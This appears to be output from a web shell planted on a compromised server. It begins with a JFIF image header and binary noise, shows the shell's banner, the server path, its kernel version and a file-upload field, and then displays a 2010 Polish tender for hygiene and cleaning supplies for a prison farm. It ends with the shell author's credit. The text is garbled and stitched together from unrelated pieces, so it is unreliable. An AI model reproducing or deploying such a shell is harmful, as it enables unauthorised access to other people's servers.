JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100126/21718-N-2010.html

<p class="kh_header"><b>Wygoda: dostawa środków czystości</b><br>
<b>Numer ogłoszenia: 21718 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gospodarstwo Pomocnicze przy Zakładzie Karnym , Czerwony Bór 23, 18-408 Wygoda, woj. podlaskie, tel. 086 2153595, 2163604, faks 086 2163149.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gpczerwonybor.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa środków czystości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. PRZEDMIOT ZAMÓWIENIA
1.	Przedmiotem zamówienia jest dostawa środków czystości  na rzecz Zamawiającego, według wyszczególnienia zawartego w pkt 2, do następujących punktów: 

1)	Gospodarstwo Pomocnicze przy Zakładzie Karnym w Czerwonym Borze, Czerwony Bór 23, 18-400 Łomża;
2)	punkt sprzedaży Gospodarstwa w Zakładzie Karnym w Czerwonym Borze, Czerwony Bór 2, 18-400 Łomża;
3)	Przytuły Stare 13a, 07-411 Rzekuń (Areszt Śledczy Ostrołęka - Oddział Tymczasowego Zakwaterowania Skazanych. 
2.	Wyszczególnienie przedmiotu dostawy : 

L.p.	Asortyment	Jm.	Ilość do:
1.	antyperspirant NIVEA 40ml	szt.	1000
2.	antyperspirant REXONA 50ml	szt.	1000
3.	antyperspirant OLD SPACE 65 ml	szt.	1000
4.	antyperspirant adidas 50ml	szt.	100
5.	balsam do ciała Cztery Pory Roku 250ml	szt.	1000
6.	balsam do ciała Venus  250ml	szt.	500
7.	balsam do ciała DOVE 250ml	szt.	500
8.	chusteczki higieniczne	szt.	2500
9.	gąbka do ciała	szt.	1000
10.	gąbka do naczyń	szt.	3000
11.	krem do rąk Evina 75ml	szt.	500
12.	krem NIVEA 50 ml	szt.	600
13.	krem NIVEA SOFT 100ml	szt.	200
14.	maszynka do golenia GILLETTE	szt.	3500
15.	maszynka do golenia POLSILVER	szt.	1000
16.	maszynka do golenia MACH 3 TURBO	szt.	30
17.	wkłady do maszynki MACH 3	op.	30
18.	mydło ARKO 100g	szt.	2000
19.	mydło DOVE 100g	szt.	1000
20.	mydło NIVEA 100g	szt.	2000
21.	mydło PALMOLIVE 100g	szt.	1500
22.	mydło PROTEX 100g	szt.	1500
23.	mydło w płynie Pati 250g	szt.	500
24.	odświeżacz powietrza	szt.	200
25.	kostka do WC koszyk 	szt.	440
26.	oliwka do ciała BAMBI 150ml	szt.	300
27.	papier toaletowy szary Dafi op. 8 szt	op.	1300
28.	pasta do zębów SIGNAL 125ml	szt.	600
29.	pasta do zębów BLEND a  MED. 125ml	szt.	2000
30.	pasta do zębów COLGATE 125ml	szt.	1000
31.	pasta do zębów ELMEX 	szt.	200
32.	pasta do zębów SENSODYNE	szt.	200
33.	pasta do zębów BLEND a  MED. 3 WHITE perła	szt.	300
34.	nitka dentystyczna Jordan	szt	100
35.	Pumeks	szt.	300
36.	krem do stóp antybakteryjny Soraya	szt.	300
37.	talk do stóp	szt.	100
38.	patyczki kosmetyczne	szt.	1000
39.	pędzelek do golenia	szt.	150
40.	pianka do golenia GILETTE 200ml	szt.	1000
41.	pianka do golenia Bond 200ml	szt.	500
42.	krem do golenia Wars 65g	szt.	200
43.	żel do golenia Gillette	szt.	1000
44.	balsam po goleniu BOND	szt.	2000
45.	żel do mycia twarzy NIVEA visage	szt.	100
46.	płatki kosmetyczne 	op.	200
47.	płyn do naczyń 250ml	szt.	3000
48.	płyn do naczyń 500ml	szt.	100
49.	płyn do płukania Silan 500ml	szt.	2000
50.	płyn do prania KOKOSAL 450ml	szt.	300
51.	proszek do prania E 300g	szt.	2000
52.	proszek do prania IXI 400g	szt.	2500
53.	proszek do prania PERSIL 400g	szt.	1500
54.	szampon familijny 500ml	szt.	600
55.	szampon HEAD SHOULDERS400ml	szt.	600
56.	szampon NIVEA 250ml	szt.	600
57.	szampon TIMOTEI 200ml	szt.	600
58.	szampon PALMOLIVE 200ML	szt.	600
59.	szczoteczka do zębów	szt.	2500
60.	tonik do twarzy 200ml	szt.	200
61.	mleczko do ciała NIVEA 250ml	szt.	400
62.	Mydelniczka	szt.	200
63.	worki na śmieci 60l	szt.	5000
64.	żel do włosów 150g	szt.	500
65.	żel pod prysznic Fa 200ml	szt.	1500
66.	żel pod prysznic BOND 200ml	szt.	1500
67.	obcinacz do paznokci bez nożyka	szt.	300
68.	peeling do twarzy 	szt.	100
69.	krem do twarzy DOVE 150ml	szt.	500
70.	krem do twarzy NIVEA VISAGE Q 10 50ml	szt.	100
71.	chusteczki nawilżające	szt.	100
72.	Papier toaletowy zapach op. 8 szt.	op.	1000
73.	Worki na śmieci 120l -25 szt. czarne mocne	op.	500
74.	Ace 1 l	szt	100
75.	Czyścik do teflonu i stali nierdzewnej	szt	50
76.	Druciak - zmywak	szt	50
77.	druciak spiralny maxi	szt	100
78.	Gąbka do zmywania duża dwuwarstwowa op.5 szt.	op.	200
79.	Kostka do spłuczki	szt	30
80.	Mleczko do czyszczenia urządzeń sanitarnych, sprzętu i naczyń kuchennych 500ml	szt	320
81.	Mydło toaletowe 100 g	szt	3000
82.	Mydło toaletowe 200 g Biały Jeleń	szt	50
83.	Mydło w płynie 5 l	op.	20
84.	Mydło w płynie antybakteryjne 5 l	op.	5
85.	Odświeżacz powietrza stojący podnoszony w żelu	szt	200
86.	Odświeżacz powietrza w aerozolu	szt	150
87.	Papier toaletowy zapach op. 8 szt.	op.	150
88.	Pasta BHP mydlana 500 g	szt	2400
89.	Pasta do czyszczenia urządzeń sanitarnych, sprzętów i naczyń kuchennych 250 g	szt	70
90.	Płyn do czyszczenia i dezynfekcji toalet i innych urządzeń sanitarnych 750 ml z dodatkiem chloru	szt	260
91.	Płyn do czyszczenia powierzchni drewnianych aerozol 250 ml	szt	50
92.	Płyn do mycia naczyń kuchennych 5 l	op.	150
93.	Płyn do mycia szyb atomizer 500 ml	szt	270
94.	Preparat do udrażniania rur w żelu 500 ml	szt	50
95.	Proszek do prania w automacie - biel	kg	25
96.	Proszek do prania w automacie - kolor	kg	25
97.	Proszek do szorowania sprzetu i urządzeń kuchennych 1000 g	szt	20
98.	Ręcznik papierowy kuchenny op. 2 szt  	op.	650
99.	Ręcznik papierowy biały dwuwarstwowy MAXI MAK  	szt.	350
100.	Ręcznik papierowy biały dwuwarstwowy MINI  MAK  	szt.	500
101.	Rękawiczki lateksowe op. 100 szt.	op.	60
102.	Ściereczka domowa op. 3 szt.	op.	350
103.	Ścierka ostra	szt	130
104.	Ścierka podłogowa biała	szt	180
105.	Środek do usuwania rdzy i kamienia 500 ml	szt	20
106.	Uniwersalny płyn do czyszczenia 5 l	op.	100
107.	Uniwersalny płyn do czyszczenia 750 ml	szt	130
108.	Worki na śmieci 120l 25 szt. czarne mocne	op.	750
109.	Worki na śmieci 35 l 50 szt. czarne mocne	op.	150
110.	Worki na śmieci 60l 50 szt. czarne mocne	op.	450
111.	Krem do rąk 100 ml	szt	50

3.	Warunki jakie musi spełnić przedmiot dostawy i warunki dostawy: 
1)	przedmiot dostawy musi spełniac wymogi określone przez Zamawiającego dla każdego rodzaju asortymentu, i spełniać wymogi określone przepisami odrebnymi, 
2)	dostawa będzie zrealizowana w godzinach od 7.30 do 13.30, w ciagu dwóch dni roboczych od momentu otrzymania przez Wykonawcę zamówienia,
3)	Wykonawca dostarczy przedmiot zamówienia własnym transportem, na własny koszt, 
4)	Wykonawca dokona wyładunku dostarczonego asortymentu w miejscu składowania wskazanym przez Zamawiającego,
5)	w przypadku, gdy Wykonawca dostarcza asortyment równoważny zobowiązany jest przedstawić stosowne dokumenty potwierdzające równoważność. 
4.	Termin płatności wynagrodzenia należnego Wykonawcy wynosi 30 dni od daty dostarczenia prawidłowo wystawionej faktury do siedziby Zamawiającego.
5.	Zamawiający nie przyjmie faktury jeżeli zostaną zgłoszone jakiekolwiek zastrzeżenia do przedmiotu dostawy. 
6.	Zamawiający w terminie 7 dni roboczych licząc od dnia dostawy ma prawo reklamować przedmiot dostawy. 
7.	Na rozpatrzenie reklamacji Wykonawca ma 7 dni roboczych. 
8.	W przypadku uznania reklamacji Wykonawca w ciągu 7 dni roboczych usunie zgłoszone nieprawidłowości poprzez uzupełnienie dostawy w przypadku rozbieżności w ilości lub - wymieni towar na nowy w przypadku zakwestionowania jakości.
9.	Reklamacje Zamawiający będzie zgłaszał pocztą, telefonicznie lub faxem za potwierdzeniem, do osoby wskazanej przez Wykonawcę.
10.	Nie udzielenie odpowiedzi na złożoną reklamację w ciągu 7 dni roboczych od dnia jej otrzymania przyjmuje się za uznanie reklamacji.
11.	Wykonawca udzieli na każdy asortyment z przedmiotu dostawy,  gwarancji nie krótszej niż gwarancja producenta..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 24.95.50.00-3, 24.95.90.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU 

O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy i nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, z przyczyn określonych w art. 24 ust. 1 ustawy. 

II. OPIS SPOSOBU  DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU. 
1.	Zamawiający będzie dokonywał oceny spełniania warunków udziału w postępowaniu w stosunku do każdego Wykonawcy na podstawie dokumentów dostarczonych przez Wykonawcę jako załączniki do oferty.  
2.	Sposób spełniania warunków odbywać się będzie na zasadzie spełnia/ nie spełnia, z zastrzeżeniem art. 26 ust. 3 Ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. WYKAZ DOKUMENTÓW I OŚWIADCZEŃ, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY. 
1. Wykonawca składa wraz z ofertą sporządzoną na formularzu oferty stanowiącym załącznik nr A do SIWZ oraz załącznikiem A -1 ( formularzem elektronicznym złożonym w formie elektronicznej i pisemnej) następujące dokumenty i oświadczenia: 

1.1. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy, Wykonawca składa wraz z ofertą : 
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	Dokument pełnomocnictwa1;	
3)	Dokument pełnomocnictwa dla podmiotu reprezentującego Wykonawców2;
         1.2. Wykonawcy zagraniczni mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej) składają: 
1)	w zakresie dokumentu, o którym mowa w pkt. 1.1 ppkt 1 składają dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania Wykonawca zagraniczny, zastrzeżeniem ppkt. 2, 
2)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w ppkt.1. Wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymaganą dla tych dokumentów.
II. ZASADY UDZIAŁU W POSTĘPOWANIU WYKONAWCÓW WYSTĘPUJĄCYCH WSPÓLNIE
1.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika 
do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
2.	Pozostałe dokumenty i oświadczenia, każdy z wykonawców występujących wspólnie składa oddzielnie. 
V. FORMA DOKUMENTÓW
1.	Wymagane dokumenty powinny być przedstawione w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy. 
Za osoby uprawnione do reprezentowania Wykonawcy uznaje się osoby upoważnione do reprezentowania firmy, wskazane we właściwym rejestrze lub ewidencji działalności gospodarczej bądź w stosownym pełnomocnictwie, które należy załączyć do oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osobę udzielającą pełnomocnictwa lub poświadczone notarialnie.
2.	W przypadku, gdy załączone do oferty dokumenty zostały sporządzone w języku obcym (w tym dokumenty składane przez Wykonawcę zagranicznego) niezbędne jest przedstawienie ich tłumaczenia na język polski, poświadczonego przez Wykonawcę.
3.	Jeżeli złożone kserokopie dokumentów będą nieczytelne lub będą budzić wątpliwości co do ich prawdziwości, Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gpczerwonybor.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego pok 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2010 godzina 12:00, miejsce: siedziba Zamawiającego - Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com